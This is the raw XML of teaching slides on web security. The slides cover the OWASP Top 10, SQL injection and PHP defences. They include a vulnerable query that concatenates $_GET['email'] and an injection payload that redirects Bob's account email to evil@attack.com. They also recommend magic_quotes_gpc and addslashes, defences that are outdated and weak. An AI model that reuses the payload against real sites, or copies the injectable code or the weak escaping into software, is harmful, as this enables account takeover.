            <a:ext cx="251222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TW" sz="2400" dirty="0"/>
              <a:t>Actual parse tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(simplified)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80810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Compromised Websites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Compromised legitimate websites can introduce malware and scams.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>They are, of course, more convincing than faked websites to the users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>You cannot prevent others with malicious intents from faking your website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>However, you can prevent your website from being compromised.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Prevention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Properly configure the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Use secure application interfaces</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Validate (sanitize) all inputs from the user and even the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Apply detection/verification tools and repair errors before deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Commercial tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Free tools from research laboratories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Etc.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Common Vulnerabilities and Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Objectives and Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>References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OWASP Top 10 Application Security Risks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Broken Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Cryptographic Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection (including Cross-Site Scripting (XSS))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Insecure Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Vulnerable and Outdated Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Identification and Authentication Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Software and Data Integrity Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Security Logging and Monitoring Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Server-Side Request Forgery (SSRF)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Changed from 2007 to 2010</a:t>
            </a:r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317399"/>
            <a:ext cx="9144032" cy="4897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Changed from 2010 to 2013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5380" y="1457324"/>
            <a:ext cx="9169380" cy="4595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Changed from 2013 to 2017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0768"/>
            <a:ext cx="9144000" cy="490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4126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Changed from 2017 to 2020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F69F5B30-0249-7B47-A165-BE37E8FA0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57079"/>
            <a:ext cx="9144000" cy="234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742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SQL Injection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Example (forget password):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>	relevant code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>The attacker may set things up to steal the account of Bob (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bob@example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>) by fooling the server to execute:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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 bwMode="auto">
          <a:xfrm>
            <a:off x="3000364" y="2932354"/>
            <a:ext cx="5143536" cy="928694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$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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sql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 = “SELECT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login_id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passwd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full_name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email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            FROM users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            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WHERE email = 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‘” . </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" b="1" dirty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$_GET[‘email’] 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. “’”;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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="群組 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1214414" y="1714488"/>
            <a:ext cx="7000924" cy="1071570"/>
            <a:chOff x="1214414" y="3071810"/>
            <a:chExt cx="7572428" cy="1071570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1214414" y="3071810"/>
              <a:ext cx="7572428" cy="1071570"/>
            </a:xfrm>
            <a:prstGeom prst="rect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z="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Forgot Password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TW" sz="2000" b="1" dirty="0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rPr>
                <a:t>Email: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TW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We will send you</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0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rPr>
                <a:t>r</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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 account</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" b="1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 information </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0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rPr>
                <a:t>to your</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" b="1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 email address. </a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-TW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2141650" y="3429000"/>
              <a:ext cx="2143140" cy="28575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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214414" y="4643446"/>
            <a:ext cx="4286280" cy="178595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SELECT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login_id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passwd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full_name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email</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW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FROM users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W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HERE email = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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x’;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UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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 users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SET email = ‘evil@attack.com’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WHERE email = ‘bob@example.com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’;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Defenses against SQL Injection in PHP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Sources (where tainted data come from)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_SERVER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_COOKIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_SESSION </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>Sinks (where tainted data should not be used)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_create_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_db_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_drop_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_unbuffered_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Parameter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
              <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Built-in function: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
              <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Prepared statements (for database accesses)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Defenses against SQL Injection (cont.) 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Set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t> parameter on in the PHP configuration file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>When the parameter is on, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> (single-quote), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> (double quote), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> (backslash) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> characters are escaped with a backslash automatically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>Built-in function: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( string $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>The same effect as setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
          </a:p>
          <a:p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285852" y="4500570"/>
            <a:ext cx="3500462" cy="15001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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = "Is your name O‘Brien?";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// Output: Is your name O\‘Brien?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?&gt; 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Defenses against SQL Injection (cont.)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Prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Set up a statement once, and then execute it many times with different parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>The ? is called a placeholder. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>To execute the above query, one needs to supply the actual value for ?.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>The first argument of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bind_param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> is the input’s type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, s for string, d for double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285852" y="2951805"/>
            <a:ext cx="7143800" cy="14773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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>db_connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>", "user", "pass", "db"); $statement = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>db_connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-&gt;prepare("SELECT * FROM users WHERE id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$statement-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bind_param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>", $id);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
